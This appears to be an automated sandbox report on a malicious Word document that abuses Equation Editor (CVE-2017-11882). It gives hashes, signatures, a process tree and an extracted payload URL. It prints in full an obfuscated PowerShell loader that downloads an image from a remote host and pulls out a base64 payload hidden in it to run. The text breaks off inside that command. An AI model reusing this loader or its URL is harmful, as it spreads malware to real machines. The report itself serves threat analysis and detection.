Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
22/08/2024, 10:36
Static task
static1
Behavioral task
behavioral1
Sample
ab6a233f41353b78344e40ea3facd999ab2c8a1de661195303689a8623a2fc01.docx
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
ab6a233f41353b78344e40ea3facd999ab2c8a1de661195303689a8623a2fc01.docx
Resource
win10v2004-20240802-en
General
-
Target
ab6a233f41353b78344e40ea3facd999ab2c8a1de661195303689a8623a2fc01.docx
-
Size
369KB
-
MD5
86ddddd33810e007512f0229b24be0bc
-
SHA1
e81d9b9a0460495fec9262e6e27392a8d0ef8f27
-
SHA256
ab6a233f41353b78344e40ea3facd999ab2c8a1de661195303689a8623a2fc01
-
SHA512
4321ef749f9de8571540f20afc9ba7b4b033c20180d082bf31817dec72274e7989fbadc9cb6491371926e9b5efa4b874da60e64278eaa8127fb8daa05ce88aa3
-
SSDEEP
6144:BjyKL7thxW6C6rELBvzNEfGi1od8dyLj5y7SYtYuep9danlYOU5lMpm1DfLi/CJ:YKL7P86CdvzNEfGi1G5kz2uuAlYOUlAC
Malware Config
Extracted
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 12 980 EQNEDT32.EXE 14 552 powershell.exe 15 552 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2696 powershell.exe 552 powershell.exe -
Abuses OpenXML format to download file from external location
-
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 980 EQNEDT32.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2388 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2696 powershell.exe 552 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2696 powershell.exe Token: SeDebugPrivilege 552 powershell.exe Token: SeShutdownPrivilege 2388 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2388 WINWORD.EXE 2388 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 980 wrote to memory of 2660 980 EQNEDT32.EXE 32 PID 980 wrote to memory of 2660 980 EQNEDT32.EXE 32 PID 980 wrote to memory of 2660 980 EQNEDT32.EXE 32 PID 980 wrote to memory of 2660 980 EQNEDT32.EXE 32 PID 2660 wrote to memory of 2696 2660 WScript.exe 34 PID 2660 wrote to memory of 2696 2660 WScript.exe 34 PID 2660 wrote to memory of 2696 2660 WScript.exe 34 PID 2660 wrote to memory of 2696 2660 WScript.exe 34 PID 2388 wrote to memory of 1576 2388 WINWORD.EXE 36 PID 2388 wrote to memory of 1576 2388 WINWORD.EXE 36 PID 2388 wrote to memory of 1576 2388 WINWORD.EXE 36 PID 2388 wrote to memory of 1576 2388 WINWORD.EXE 36 PID 2696 wrote to memory of 552 2696 powershell.exe 37 PID 2696 wrote to memory of 552 2696 powershell.exe 37 PID 2696 wrote to memory of 552 2696 powershell.exe 37 PID 2696 wrote to memory of 552 2696 powershell.exe 37
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ab6a233f41353b78344e40ea3facd999ab2c8a1de661195303689a8623a2fc01.docx"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1576
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\niceworkofyummybutterbu.vBS"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔VQBy⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔9⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔JwBo⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bw⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔Og⤖ ䷮ ⫗ ⫁ ⺔v⤖ ䷮ ⫗ ⫁ ⺔C8⤖ ䷮ ⫗ ⫁ ⺔aQBh⤖ ䷮ ⫗ ⫁ ⺔Dg⤖ ䷮ ⫗ ⫁ ⺔M⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔z⤖ ䷮ ⫗ ⫁ ⺔DE⤖ ䷮ ⫗ ⫁ ⺔M⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔0⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔dQBz⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔YQBy⤖ ䷮ ⫗ ⫁ ⺔GM⤖ ䷮ ⫗ ⫁ ⺔a⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔HY⤖ ䷮ ⫗ ⫁ ⺔ZQ⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔cgBn⤖ ䷮ ⫗ ⫁ ⺔C8⤖ ䷮ ⫗ ⫁ ⺔Mg⤖ ䷮ ⫗ ⫁ ⺔3⤖ ䷮ ⫗ ⫁ ⺔C8⤖ ䷮ ⫗ ⫁ ⺔aQB0⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bQBz⤖ ䷮ ⫗ ⫁ ⺔C8⤖ ䷮ ⫗ ⫁ ⺔dgBi⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔Xw⤖ ䷮ ⫗ ⫁ ⺔y⤖ ䷮ ⫗ ⫁ ⺔D⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔Mg⤖ ䷮ ⫗ ⫁ ⺔0⤖ ䷮ ⫗ ⫁ ⺔D⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔Nw⤖ ䷮ ⫗ ⫁ ⺔y⤖ ䷮ ⫗ ⫁ ⺔DY⤖ ䷮ ⫗ ⫁ ⺔Xw⤖ ䷮ ⫗ ⫁ ⺔y⤖ ䷮ ⫗ ⫁ ⺔D⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔Mg⤖ ䷮ ⫗ ⫁ ⺔0⤖ ䷮ ⫗ ⫁ ⺔D⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔Nw⤖ ䷮ ⫗ ⫁ ⺔y⤖ ䷮ ⫗ ⫁ ⺔DY⤖ ䷮ ⫗ ⫁ ⺔LwB2⤖ ䷮ ⫗ ⫁ ⺔GI⤖ ䷮ ⫗ ⫁ ⺔cw⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔Go⤖ ䷮ ⫗ ⫁ ⺔c⤖ ䷮ ⫗ ⫁ ⺔Bn⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔Ow⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔Hc⤖ ䷮ ⫗ ⫁ ⺔ZQBi⤖ ䷮ ⫗ ⫁ ⺔EM⤖ ䷮ ⫗ ⫁ ⺔b⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bgB0⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔PQ⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔E4⤖ ䷮ ⫗ ⫁ ⺔ZQB3⤖ ䷮ ⫗ ⫁ ⺔C0⤖ ䷮ ⫗ ⫁ ⺔TwBi⤖ ䷮ ⫗ ⫁ ⺔Go⤖ ䷮ ⫗ ⫁ ⺔ZQBj⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔BT⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔cwB0⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bQ⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔E4⤖ ䷮ ⫗ ⫁ ⺔ZQB0⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔VwBl⤖ ䷮ ⫗ ⫁ ⺔GI⤖ ䷮ ⫗ ⫁ ⺔QwBs⤖ ䷮ ⫗ ⫁ ⺔Gk⤖ ䷮ ⫗ ⫁ ⺔ZQBu⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔Ow⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔Gk⤖ ䷮ ⫗ ⫁ ⺔bQBh⤖ ䷮ ⫗ ⫁ ⺔Gc⤖ ䷮ ⫗ ⫁ ⺔ZQBC⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔9⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔B3⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔YgBD⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔aQBl⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔EQ⤖ ䷮ ⫗ ⫁ ⺔bwB3⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔b⤖ ䷮ ⫗ ⫁ ⺔Bv⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔BE⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔Cg⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔VQBy⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔KQ⤖ ䷮ ⫗ ⫁ ⺔7⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔aQBt⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔ZwBl⤖ ䷮ ⫗ ⫁ ⺔FQ⤖ ䷮ ⫗ ⫁ ⺔ZQB4⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔9⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔WwBT⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔cwB0⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bQ⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔FQ⤖ ䷮ ⫗ ⫁ ⺔ZQB4⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔LgBF⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔YwBv⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔aQBu⤖ ䷮ ⫗ ⫁ ⺔Gc⤖ ䷮ ⫗ ⫁ ⺔XQ⤖ ䷮ ⫗ ⫁ ⺔6⤖ ䷮ ⫗ ⫁ ⺔Do⤖ ䷮ ⫗ ⫁ ⺔VQBU⤖ ䷮ ⫗ ⫁ ⺔EY⤖ ䷮ ⫗ ⫁ ⺔O⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔Ec⤖ ䷮ ⫗ ⫁ ⺔ZQB0⤖ ䷮ ⫗ ⫁ ⺔FM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔By⤖ ䷮ ⫗ ⫁ ⺔Gk⤖ ䷮ ⫗ ⫁ ⺔bgBn⤖ ䷮ ⫗ ⫁ ⺔Cg⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔QgB5⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔ZQBz⤖ ䷮ ⫗ ⫁ ⺔Ck⤖ ䷮ ⫗ ⫁ ⺔Ow⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BG⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔PQ⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔P⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔8⤖ ䷮ ⫗ ⫁ ⺔EI⤖ ䷮ ⫗ ⫁ ⺔QQBT⤖ ䷮ ⫗ ⫁ ⺔EU⤖ ䷮ ⫗ ⫁ ⺔Ng⤖ ䷮ ⫗ ⫁ ⺔0⤖ ䷮ ⫗ ⫁ ⺔F8⤖ ䷮ ⫗ ⫁ ⺔UwBU⤖ ䷮ ⫗ ⫁ ⺔EE⤖ ䷮ ⫗ ⫁ ⺔UgBU⤖ ䷮ ⫗ ⫁ ⺔D4⤖ ䷮ ⫗ ⫁ ⺔Pg⤖ ䷮ ⫗ ⫁ ⺔n⤖ ䷮ ⫗ ⫁ ⺔Ds⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔BG⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔PQ⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔P⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔8⤖ ䷮ ⫗ ⫁ ⺔EI⤖ ䷮ ⫗ ⫁ ⺔QQBT⤖ ䷮ ⫗ ⫁ ⺔EU⤖ ䷮ ⫗ ⫁ ⺔Ng⤖ ䷮ ⫗ ⫁ ⺔0⤖ ䷮ ⫗ ⫁ ⺔F8⤖ ䷮ ⫗ ⫁ ⺔RQBO⤖ ䷮ ⫗ ⫁ ⺔EQ⤖ ䷮ ⫗ ⫁ ⺔Pg⤖ ䷮ ⫗ ⫁ ⺔+⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔Ow⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BJ⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔Hg⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔9⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔V⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔Hg⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔Ek⤖ ䷮ ⫗ ⫁ ⺔bgBk⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔e⤖ ䷮ ⫗ ⫁ ⺔BP⤖ ䷮ ⫗ ⫁ ⺔GY⤖ ䷮ ⫗ ⫁ ⺔K⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BG⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔Ck⤖ ䷮ ⫗ ⫁ ⺔Ow⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bgBk⤖ ䷮ ⫗ ⫁ ⺔Ek⤖ ䷮ ⫗ ⫁ ⺔bgBk⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔e⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔D0⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔Gk⤖ ䷮ ⫗ ⫁ ⺔bQBh⤖ ䷮ ⫗ ⫁ ⺔Gc⤖ ䷮ ⫗ ⫁ ⺔ZQBU⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔e⤖ ䷮ ⫗ ⫁ ⺔B0⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔SQBu⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQB4⤖ ䷮ ⫗ ⫁ ⺔E8⤖ ䷮ ⫗ ⫁ ⺔Zg⤖ ䷮ ⫗ ⫁ ⺔o⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔ZQBu⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔RgBs⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔Zw⤖ ䷮ ⫗ ⫁ ⺔p⤖ ䷮ ⫗ ⫁ ⺔Ds⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔Bz⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔YQBy⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔SQBu⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQB4⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔LQBn⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔w⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔LQBh⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔ZQBu⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔SQBu⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQB4⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔LQBn⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BJ⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔Hg⤖ ䷮ ⫗ ⫁ ⺔Ow⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BJ⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔Hg⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔r⤖ ䷮ ⫗ ⫁ ⺔D0⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BG⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔T⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔ZwB0⤖ ䷮ ⫗ ⫁ ⺔Gg⤖ ䷮ ⫗ ⫁ ⺔Ow⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔GI⤖ ䷮ ⫗ ⫁ ⺔YQBz⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔Ng⤖ ䷮ ⫗ ⫁ ⺔0⤖ ䷮ ⫗ ⫁ ⺔Ew⤖ ䷮ ⫗ ⫁ ⺔ZQBu⤖ ䷮ ⫗ ⫁ ⺔Gc⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bo⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔PQ⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔ZQBu⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔SQBu⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQB4⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔LQ⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔cwB0⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔cgB0⤖ ䷮ ⫗ ⫁ ⺔Ek⤖ ䷮ ⫗ ⫁ ⺔bgBk⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔e⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔7⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔YgBh⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔ZQ⤖ ䷮ ⫗ ⫁ ⺔2⤖ ䷮ ⫗ ⫁ ⺔DQ⤖ ䷮ ⫗ ⫁ 